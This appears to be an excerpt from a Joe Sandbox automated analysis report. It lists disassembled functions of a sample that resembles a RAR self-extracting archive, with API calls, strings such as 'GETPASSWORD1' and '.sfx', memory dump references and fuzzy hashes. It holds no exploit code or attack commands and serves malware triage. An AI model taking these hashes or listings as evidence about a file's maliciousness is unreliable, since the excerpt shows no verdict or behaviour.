Instruction Fuzzy Hash: 9E91EF71208355AFD710DF65C844E2BBBEAFB8A700F00491EF59AD3220DB34A946CF62

Function 0069C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 006A05DA: _wcslen.LIBCMT ref: 006A05E0

Part of subcall function 0069B92D: _wcsrchr.LIBVCRUNTIME ref: 0069B944

_wcslen.LIBCMT ref: 0069C197
_wcslen.LIBCMT ref: 0069C1DF

Strings

.exe, xrefs: 0069C10B
.sfx, xrefs: 0069C11A
.rar, xrefs: 0069C0E1, 0069C134

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: a7e1f39c93f998c221c88d59c65874104e2248e221e9ca1e941d36eadc59fb41
Instruction ID: 592692e762b57c8dfeb9a78ce66b6db76a4dd2f86060b512161bbfb93e234c92
Opcode Fuzzy Hash: a7e1f39c93f998c221c88d59c65874104e2248e221e9ca1e941d36eadc59fb41
Instruction Fuzzy Hash: D7415B215003619ADF31BF349812ABB73AFEF46764F14450EF9C16BA82EB618D82D35D

Function 0069BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0069BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0069A275,?,?,00000800,?,0069A23A,?,0069755C), ref: 0069BBC5
_wcslen.LIBCMT ref: 0069BC3B

Strings

\\?\, xrefs: 0069BB52, 0069BB99, 0069BBF7, 0069BC4E
UNC, xrefs: 0069BBA7

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: acb417e83686560608ca24bca2011ea5d1253bb3085d7ecd8d3891aee48356cf
Instruction ID: 980f4b1a89d3e4958e91d38296effd44307a23544ddecda36e480c2b8b352a7a
Opcode Fuzzy Hash: acb417e83686560608ca24bca2011ea5d1253bb3085d7ecd8d3891aee48356cf
Instruction Fuzzy Hash: CA41C131400225F6DF21AF60EE41EEE77AFAF41390F00952EF815A3651EB70DE908B64

Function 006ACD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 006ACD84

Part of subcall function 006AAF98: _wcschr.LIBVCRUNTIME ref: 006AB033

Part of subcall function 006A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0069C116,00000000,.exe,?,?,00000800,?,?,?,006A8E3C), ref: 006A1FD1

Strings

MIN, xrefs: 006ACDF5
MAX, xrefs: 006ACDD9
<, xrefs: 006ACD68
HIDE, xrefs: 006ACDC6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: e6a16bd2b766d0bb914169f5fce149f8f5393c5177b6ca46bce28f09d011f40b
Instruction ID: ea5e87fc809492e060dd71d343cf1bf1451458657fa0ee6b596fa245faf07804
Opcode Fuzzy Hash: e6a16bd2b766d0bb914169f5fce149f8f5393c5177b6ca46bce28f09d011f40b
Instruction Fuzzy Hash: 753153719002599EDF25EB54DC41EEE73FEEB16360F40456AE506E7280EBB09E84CFA1

Function 0069B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0069B9B8

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

_wcschr.LIBVCRUNTIME ref: 0069B9D6
_wcschr.LIBVCRUNTIME ref: 0069B9E6

Strings

%c:\, xrefs: 0069B9AE

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 8661c53622bb7134c66b13f7a53dbe25fd4acd14f9c49c9f6a2dab3bc8d30207
Instruction ID: 8c382b81f036ef9a1a9a39b8ec05370c69aac961cc1789d3fccc45945bef58e0
Opcode Fuzzy Hash: 8661c53622bb7134c66b13f7a53dbe25fd4acd14f9c49c9f6a2dab3bc8d30207
Instruction Fuzzy Hash: 63014563100312699E706B35AD42DABA7AEEE86770B44540EF544D2A82EB30D84183B1

Function 006AB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

EndDialog.USER32(?,00000001), ref: 006AB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 006AB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 006AB304

Strings

GETPASSWORD1, xrefs: 006AB289
xzn, xrefs: 006AB2E2

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xzn
API String ID: 445417207-3119550372
Opcode ID: 65f5a576dfeb30b895fd3076881ede5d9f4cd81b0ac9e420838b184b33233ce2
Instruction ID: 8a874d8f3268b5dbbd42ead01dee8d9e62f6f80e3eddfee85adbf11b4945a7a4
Opcode Fuzzy Hash: 65f5a576dfeb30b895fd3076881ede5d9f4cd81b0ac9e420838b184b33233ce2
Instruction Fuzzy Hash: 6111E53290011476DF11AA649C49FFE376EEF0B700F000026FA45F62C2C7A09E519B61

Function 006AB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 006AB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 006AB712
DeleteObject.GDI32(00000000), ref: 006AB744
DeleteObject.GDI32(00000000), ref: 006AB767

Part of subcall function 006AA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,006AB73D,00000066), ref: 006AA6D5
Part of subcall function 006AA6C2: SizeofResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA6EC
Part of subcall function 006AA6C2: LoadResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA703
Part of subcall function 006AA6C2: LockResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA712
Part of subcall function 006AA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,006AB73D,00000066), ref: 006AA72D
Part of subcall function 006AA6C2: GlobalLock.KERNEL32(00000000), ref: 006AA73E
Part of subcall function 006AA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 006AA762
Part of subcall function 006AA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 006AA7A7
Part of subcall function 006AA6C2: GlobalUnlock.KERNEL32(00000000), ref: 006AA7C6
Part of subcall function 006AA6C2: GlobalFree.KERNEL32(00000000), ref: 006AA7CD

Strings

], xrefs: 006AB71A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: c8969b299a1f0daf4a8863434d94a40a93d324688e6065308a10215ab183e00a
Instruction ID: 01ef1cbdfcb07b98c214935d8c9ddd885fe5750a055a49c672c8fbf4cd5bf1c3
Opcode Fuzzy Hash: c8969b299a1f0daf4a8863434d94a40a93d324688e6065308a10215ab183e00a
Instruction Fuzzy Hash: 3801843694011567C7127BB49C09ABF7A7B9FC2752F19101AF900A7392DFA1CD058F65

Function 006AD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

EndDialog.USER32(?,00000001), ref: 006AD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 006AD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 006AD675
SetDlgItemTextW.USER32(?,00000068), ref: 006AD684

Strings

RENAMEDLG, xrefs: 006AD618

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 0ab4741f73d7002e7f64eb44d9626271e3f250e3cb6005abb6d119ef0ded5f22
Instruction ID: 6f6a0e4a1b5fb81c243ae4ba7334a85edfe99d34cd0c1b7454ebec0460534405
Opcode Fuzzy Hash: 0ab4741f73d7002e7f64eb44d9626271e3f250e3cb6005abb6d119ef0ded5f22
Instruction Fuzzy Hash: 9201F533244310BBD3106F649E09FAB775FEB5BB01F215811F206A6594C6A29E05CF69

Function 006B7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006B7E24,00000000,?,006B7DC4,00000000,006CC300,0000000C,006B7F1B,00000000,00000002), ref: 006B7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006B7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,006B7E24,00000000,?,006B7DC4,00000000,006CC300,0000000C,006B7F1B,00000000,00000002), ref: 006B7EC9

Strings

CorExitProcess, xrefs: 006B7E9E
mscoree.dll, xrefs: 006B7E8C

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 419bdabe20ad8e62ffd0b3692f89c9fa194aa0ddcf1d7f75673c50e3cf4fd113
Instruction ID: cdcea52485f1e83e3bd680e10ad6132788130cdc6c7639f929335ef926379d35
Opcode Fuzzy Hash: 419bdabe20ad8e62ffd0b3692f89c9fa194aa0ddcf1d7f75673c50e3cf4fd113
Instruction Fuzzy Hash: CCF04471A00218BBCB159FA4DC09FEEBFB6EF44711F0180A9F805A6350DB359E45CB94

Function 0069F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006A0836
Part of subcall function 006A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0069F2D8,Crypt32.dll,00000000,0069F35C,?,?,0069F33E,?,?,?), ref: 006A0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0069F2E4
GetProcAddress.KERNEL32(006D81C8,CryptUnprotectMemory), ref: 0069F2F4

Strings

CryptUnprotectMemory, xrefs: 0069F2EA
CryptProtectMemory, xrefs: 0069F2DE
Crypt32.dll, xrefs: 0069F2CE

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 51f84ea2c880a4129e2fd910520fd9943a7355a5db4cdd5c0d263fa0b0fa9ee6
Instruction ID: 5b28ab9a74b182e7a4e95a0c1a1cc0ddc63eb17d9b26b3c7d54dd38550c49363
Opcode Fuzzy Hash: 51f84ea2c880a4129e2fd910520fd9943a7355a5db4cdd5c0d263fa0b0fa9ee6
Instruction Fuzzy Hash: 94E086719107219EDB209FB5984DFA17ADAAF05700F15C81DF0DAD3740D6B6D5508B50

Function 006B2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006B2CA1
___AdjustPointer.LIBCMT ref: 006B2CC4
_abort.LIBCMT ref: 006B2D12
___AdjustPointer.LIBCMT ref: 006B2D60

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: b60184b3f5f6641aeecef4c3b65d2f90928c2033a750222d0e45666a11e1c3a2
Instruction ID: a0b291bd606a21bdf8e30ee1723840e353d48d3ea050d8c4fd2c1e72c2c0228d
Opcode Fuzzy Hash: b60184b3f5f6641aeecef4c3b65d2f90928c2033a750222d0e45666a11e1c3a2
Instruction Fuzzy Hash: B751BBB2600213AFEB699F14D865BEA7BE6FF14311F24452DE805872A1E731ADC1DB90

Function 006BBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006BBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006BBF5C

Part of subcall function 006B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006BCA2C,00000000,?,006B6CBE,?,00000008,?,006B91E0,?,?,?), ref: 006B8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006BBF82
_free.LIBCMT ref: 006BBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006BBFA4

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 180cf6c1a35fc777f1c32eeb27542441cc85aee1b97752d9c3e75804d4df233f
Instruction ID: 2c1f1984a3cb19bf5a37c3b713e7c1bc86904332f75e405bffd77c6b95d556d6
Opcode Fuzzy Hash: 180cf6c1a35fc777f1c32eeb27542441cc85aee1b97752d9c3e75804d4df233f
Instruction Fuzzy Hash: D70171F26056257F23212AB65C49CFB7A6FDEC2BA13145129F944D3342EFA0CD429AB0

Function 006B9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,006D1030,00000200,006B91AD,006B617E,?,?,?,?,0069D984,?,?,?,00000004,0069D710,?), ref: 006B986E
_free.LIBCMT ref: 006B98A3
_free.LIBCMT ref: 006B98CA
SetLastError.KERNEL32(00000000,006C3A34,00000050,006D1030), ref: 006B98D7
SetLastError.KERNEL32(00000000,006C3A34,00000050,006D1030), ref: 006B98E0

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 4e2de26a59cb08b620cfda3025019d12c496c52361e5a40cfdd2df10b1c6b858
Instruction ID: e290af8646bf3dc8a2e0446b4d33dd4a425fb6868f50983013e061de7a6cb597
Opcode Fuzzy Hash: 4e2de26a59cb08b620cfda3025019d12c496c52361e5a40cfdd2df10b1c6b858
Instruction Fuzzy Hash: 4901D1B62446116BC31227646C85DEA262B9FD2760721053EF70592392EE21CD829739

Function 006A0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 006A11CF: ResetEvent.KERNEL32(?), ref: 006A11E1
Part of subcall function 006A11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006A11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 006A0F21
CloseHandle.KERNEL32(?,?), ref: 006A0F3B
DeleteCriticalSection.KERNEL32(?), ref: 006A0F54
CloseHandle.KERNEL32(?), ref: 006A0F60
CloseHandle.KERNEL32(?), ref: 006A0F6C

Part of subcall function 006A0FE4: WaitForSingleObject.KERNEL32(?,000000FF,006A1206,?), ref: 006A0FEA
Part of subcall function 006A0FE4: GetLastError.KERNEL32(?), ref: 006A0FF6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 18add4b46601515173968ccf54b08deb561ffaa26ee7914b683c5e37fe196145
Instruction ID: b2344c8765e73667e288c569907edb077ef3a1418fd3fecd1649b68dd55e6924
Opcode Fuzzy Hash: 18add4b46601515173968ccf54b08deb561ffaa26ee7914b683c5e37fe196145
Instruction Fuzzy Hash: 3E015E72100754EFD722AB64DD84FD6FBABFB09714F00492DF26AA2260CB757A44CA94

Function 006BC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006BC817

Part of subcall function 006B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34), ref: 006B8DE2
Part of subcall function 006B8DCC: GetLastError.KERNEL32(006C3A34,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34,006C3A34), ref: 006B8DF4

_free.LIBCMT ref: 006BC829
_free.LIBCMT ref: 006BC83B
_free.LIBCMT ref: 006BC84D
_free.LIBCMT ref: 006BC85F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3f04e2422301707440d39176fa3c5e5a4bf85342456f635bf7fd027941ef2680
Instruction ID: efc3bb10c33d33db6770c327faf7a6464f37730fd4d5cace57f947bacc490f39
Opcode Fuzzy Hash: 3f04e2422301707440d39176fa3c5e5a4bf85342456f635bf7fd027941ef2680
Instruction Fuzzy Hash: 56F0FFB2504610AFC760DB68E486CD67BFFAE04764794181EF109D7652CA71FDC0CB54

Function 006A1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006A1FE5
_wcslen.LIBCMT ref: 006A1FF6
_wcslen.LIBCMT ref: 006A2006
_wcslen.LIBCMT ref: 006A2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0069B371,?,?,00000000,?,?,?), ref: 006A202F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
